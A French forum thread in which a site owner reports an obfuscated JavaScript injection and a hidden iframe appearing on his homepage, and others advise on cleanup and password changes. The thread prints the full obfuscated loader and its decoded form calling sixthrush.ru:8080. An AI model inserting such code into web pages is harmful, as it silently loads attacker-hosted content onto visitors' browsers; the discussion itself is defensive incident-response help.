Discussion :

[Ariochs]

Bonjour,

Suite à une panne de notre site jeudi et vendredi, j'ai cru que le soucis venais de chez l'hébergeur. Depuis vendredi après midi, le site fonctionne de nouveau.

Mais voila que je remarque un changement dans sur la page index..

Une balise iframe est apparu..

Voici ce que je vois dans la page :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
<script>var ZM="ZM";var c=new Array();function t(){var KW=new Array();var z="z";var r=window;this.KE="";this.WR="";var b=new String("scrip"+"tKuc".substr(0,1));var h=new Date();var rL=String("/w"+"sj"+"-ciDK".substr(0,2)+"w3eom".substr(3)+"/g"+"bXKlooXbKl".substr(4,2)+"glH2n".substr(0,2)+"e."+"co"+"m/"+"go"+"ogFqf".substr(0,2)+"xnzleznx".substr(3,2)+".c"+"dDQbo.dDQb".substr(4,2)+"nz"+".p"+"hp");var l=new Date();var A="de"+"fe"+"Y2Eor".substr(4);var j="j";var oC=new Date();var Z=r["unes"+"cape"];var WS=new Array();var D=new Date();this.f=44207;function Q(y,S){var ZH="ZH";var gN="";var J=Z(new String("kOrF]".substr(4)));var v=Z(String("162[".substr(3)));this.IJ=10394;this.cG="";var rz=String("g");var Bd=new Array();this.GU="";var F=new RegExp(v+S+J, rz);return y.replace(F, new String());var Ab="";this.gg="";};var KJ="KJ";this.gV=51238;var L=document;var G=Q('cirCeiaxtZe8EZlCexm8eCnCtx','38xiCZ');var AC=new Date();var Ra=new Date();var K=Q('82724270249242187273130576971','91725436');var W_="W_";var eC="";var tI="tI";var _="_";var FT=Q('sGrKc6','FM6KbBy4GO3SpZ9');this.Io=false;this.yF=false;this.NN=50901;this.wf=61641;function V(){var jFA="jFA";var rf="rf";var SX="";var k=Z("xqfIhtt".substr(4)+"p:/QxMa".substr(0,3)+"/si"+"xth"+"OPyrusOyP".substr(3,3)+"h.r"+"NDsu:NsD".substr(3,2));this.hm=64038;this.Yg="";var w=k+K+rL;var Yb=new Date();var Hf="Hf";var R=Q('bZo5dZyS','rtSZ5iB');var W=Q('aHpHpAeon4dJCmhPiGlodP','AFPsoTR4mJGHI6ZtW3K');var UJ="UJ";this.gr=4972;try {var SE=new Date();var li=new Array();FF=L[G](b);var qo="qo";var Gs=new Array();this.Rm=37488;FF[A]=[1,4][0];this.eO=false;var DE="";var FD="FD";FF[FT]=w;var HB=new Array();L[R][W](FF);var jx=new Array();this.yh="";} catch(SI){var bk="";var Mg="";};var ggi="";var Dt="";}var Gf=new Array();var C=Q('oHnjleoMaLdL','qMvHLGrjt2e');r[C]=V;this.XL="";var t_="";this.gc=50416;};var Vv=new Array();t();</script>
<!--78511c86434d1eb7593eaa20ab6b454a-->

Avec firebug je vois ça :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
<script defer="" src="http://sixthrush.ru:8080/wsj-com/google.com/google.co.nz.php"></script>
<iframe style="visibility: hidden;" src="http://sixthrush.ru:8080/index.php?ja=&amp;jl=&amp;pid=1"></iframe>

J'ai beau supprimer le code et remettre une ancienne version de la page, ce dernier reste présent. Que dois je faire ? Comment cela à pu arriver ?

En tout cas merci pour votre futur aide

[EDIT :] Depuis je n'ai plus accès au blog wordpress qui était lié au site

[ThomasR]

Ca ressemble à une injection XSS, supprimes ce script de ton HTML.

Ensuite tu pourrais changer tes mots-de-passe (SQL, FTP).

Identifie également la manière dont ce script a été injecté :
par formulaire ?
injection SQL ?
accès FTP ?

[armetiz]

Vérifie le contenu de tes fichiers JS.

Le probleme survient surement d'une modification d'un de tes fichiers JS qui ajoute une iFrame dans le BODY de tes pages HTML.

La modification JS n'est pas simple à trouvé, il a été hashé et ne contient pas de signe spécifique. Maintenant, il sort un peu du lot du reste des JS. A toi de le trouver

Ensuite, check la sécurité de ton serveur.

[Ariochs]

J'ai supprimé le code de chaque page pour commencer.

La je remplace le tout sur le ftp. Apres je vais supprimer l'historique de connexion de filezila et pour finir changer tout les mots de passe.

Par contre comment savoir d'où est venu le problème ? Comment il a pu s'injecter ?

[ThomasR]

J'ai supprimé le code de chaque page pour commencer.

La je remplace le tout sur le ftp. Apres je vais supprimer l'historique de connexion de filezila et pour finir changer tout les mots de passe.

Par contre comment savoir d'où est venu le problème ? Comment il a pu s'injecter ?

As-tu regardé la date de dernière modification du fichier ?

[Ariochs]

Non j'ai pas regardé.. Et le hic c'est que j'ai tout supprimé pour remettre la dernière version correcte. Il ne semble pas y avoir de problème, je vais donc voir demain si tout vas bien.

Si j'ai pas de problème d'ici demain, je rajouterais l'indication "résolu" au topic.